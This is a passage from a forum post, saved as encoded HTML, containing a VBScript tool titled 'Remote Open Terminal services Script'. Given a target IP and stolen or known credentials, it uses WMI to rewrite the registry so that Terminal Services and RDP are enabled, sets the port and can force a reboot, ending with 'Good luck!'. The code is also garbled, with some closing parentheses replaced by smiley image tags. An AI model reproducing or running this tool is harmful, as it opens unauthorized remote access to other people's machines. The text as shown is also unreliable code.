objShell.Run("cmd.exe /k cscript //nologo=20
=
"&chr(34)&wscript.scriptfullname&chr(34))<BR> =20
wscript.quit<BR>end if<BR>if=20
wscript.arguments.count<3 then<BR> =20
usage()<BR> wscript.echo "Not =
enough=20
parameters."<BR> wscript.quit<BR>end =
=
if<BR><BR>ipaddress=3Dwscript.arguments(0)<BR>username=3Dwscript.argument=
s(1)<BR>password=3Dwscript.arguments(2)<BR>if=20
wscript.arguments.count>3 then<BR> =20
=
port=3Dwscript.arguments(3)<BR>else<BR> =20
port=3D3389<BR>end if<BR>if not =
isnumeric(port) or=20
port<1 or port>65000 then<BR> =20
wscript.echo "The number of port is=20
error."<BR> wscript.quit<BR>end =
if<BR>if=20
wscript.arguments.count>4 then<BR> =20
=
reboot=3Dwscript.arguments(4)<BR>else<BR> =20
reboot=3D""<BR>end=20
if<BR><BR>usage()<BR>outstreem.write "Conneting=20
"&ipaddress&" ...."<BR>set=20
=
objlocator=3Dcreateobject("wbemscripting.swbemlocator"<IMG=20
=
src=3D"http://25.20.176.12/bbs/images/smilies/wink.gif"=20
align=3DabsMiddle border=3D0><BR>set=20
=
objswbemservices=3Dobjlocator.connectserver(ipaddress,"root/cimv2",userna=
me,password)<BR>showerror(err.number)<BR>objswbemservices.security_.privi=
leges.add=20
=
23,true<BR>objswbemservices.security_.privileges.add=20
18,true<BR><BR>outstreem.write "Checking OS=20
type...."<BR>set=20
=
colinstoscaption=3Dobjswbemservices.execquery("select=20
caption from win32_operatingsystem"<IMG=20
=
src=3D"http://25.20.176.12/bbs/images/smilies/wink.gif"=20
align=3DabsMiddle border=3D0><BR>for each =
objinstoscaption=20
in colinstoscaption<BR> if=20
instr(objinstoscaption.caption,"Server"<IMG=20
=
src=3D"http://25.20.176.12/bbs/images/smilies/wink.gif"=20
align=3DabsMiddle border=3D0>>0 =
then<BR> =20
wscript.echo "OK!"<BR> =20
else<BR> =
wscript.echo "OS=20
type is "&objinstoscaption.caption<BR> =
outstreem.write "Do you want =
to=20
cancel setup?[y/n]"<BR> =20
strcancel=3Dinstreem.readline<BR> =
=20
if lcase(strcancel)<>"n" then=20
wscript.quit<BR> end=20
if<BR>next<BR><BR>outstreem.write "Writing into =
registry=20
...."<BR>set=20
=
objinstreg=3Dobjlocator.connectserver(ipaddress,"root/default",username,p=
assword).get("stdregprov"<IMG=20
=
src=3D"http://25.20.176.12/bbs/images/smilies/wink.gif"=20
align=3DabsMiddle=20
=
border=3D0><BR>HKLM=3D&h80000002<BR>HKU=3D&h80000003<BR>with=20
objinstreg<BR>.createkey=20
=
,"SOFTWARE\Microsoft\Windows\CurrentVersion\netcache"<BR>.setdwordvalue=20
=
HKLM,"SOFTWARE\Microsoft\Windows\CurrentVersion\netcache","Enabled",0<BR>=
.createkey=20
=
HKLM,"SOFTWARE\Policies\Microsoft\Windows\Installer"<BR>.setdwordvalue=20
=
HKLM,"SOFTWARE\Policies\Microsoft\Windows\Installer","EnableAdminTSRemote=
",1<BR>.setdwordvalue=20
HKLM,"SYSTEM\CurrentControlSet\Control\Terminal=20
Server","TSEnabled",1<BR>.setdwordvalue=20
=
HKLM,"SYSTEM\CurrentControlSet\Services\TermDD","Start",2<BR>.setdwordval=
ue=20
=
HKLM,"SYSTEM\CurrentControlSet\Services\TermService","Start",2<BR>.setstr=
ingvalue=20
HKU,".DEFAULT\Keyboard=20
Layout\Toggle","Hotkey","1"<BR>.setdwordvalue=20
HKLM,"SYSTEM\CurrentControlSet\Control\Terminal=20
=
Server\WinStations\RDP-Tcp","PortNumber",port<BR>end=20
=
with<BR>showerror(err.number)<BR><BR>rebt=3Dlcase(reboot)<BR>flag=3D0<BR>=
if=20
rebt=3D"/r" or rebt=3D"-r" or rebt=3D"\r" then =
flag=3D2<BR>if=20
rebt=3D"/fr" or rebt=3D"-fr" or rebt=3D"\fr" =
then flag=3D6<BR>if=20
flag<>0 then<BR> =
outstreem.write "Now,=20
reboot target...."<BR> =
strwqlquery=3D"select *=20
from win32_operatingsystem where=20
primary=3D'true'"<BR> set=20
=
colinstances=3Dobjswbemservices.execquery(strwqlquery)<BR> =20
for each objinstance in =
colinstances<BR> =20
=20
objinstance.win32shutdown(flag)<BR> =20
next<BR> =20
showerror(err.number)<BR>else<BR> =20
wscript.echo "You need to reboot=20
target."&vbcrlf&"Then,"<BR>end=20
if<BR>wscript.echo "You can logon terminal =
services on=20
"&port&" later. Good =
luck!"<BR><BR>function=20
showerror(errornumber)<BR>if errornumber =
Then<BR> =20
wscript.echo "Error=20
0x"&cstr(hex(err.number))&" ."<BR> =
if err.description <> "" =
then<BR> =20
wscript.echo "Error =
description:=20
"&err.description&"."<BR> =
end=20
if<BR> =
wscript.quit<BR>else<BR> =20
wscript.echo "OK!"<BR>end if<BR>end=20
function<BR><BR>function usage()<BR>wscript.echo =
string(79,"*"<IMG=20
=
src=3D"http://25.20.176.12/bbs/images/smilies/wink.gif"=20
align=3DabsMiddle border=3D0><BR>wscript.echo =
"ROTS=20
v1.05"<BR>wscript.echo "Remote Open Terminal =
services=20
Script, by =B2=DD=D5=DC"<BR>wscript.echo =
"Welcome to visite <A=20
href=3D"http://www.5458.net/"=20
=
target=3D_blank>http://www.5458.net/</A>"<BR>wscript.echo=20
"Usage:"<BR>wscript.echo "cscript=20
"&wscript.scriptfullname&" targetIP =
username=20
password [port] [/r|/fr]"<BR>wscript.echo "port: =
default=20
number is 3389."<BR>wscript.echo "/r: auto =
reboot=20
target."<BR>wscript.echo "/fr: auto force reboot =
target."<BR>wscript.echo string(79,"*"<IMG=20
=
src=3D"http://25.20.176.12/bbs/images/smilies/wink.gif"=20
align=3DabsMiddle border=3D0>&vbcrlf<BR>end =
function<A=20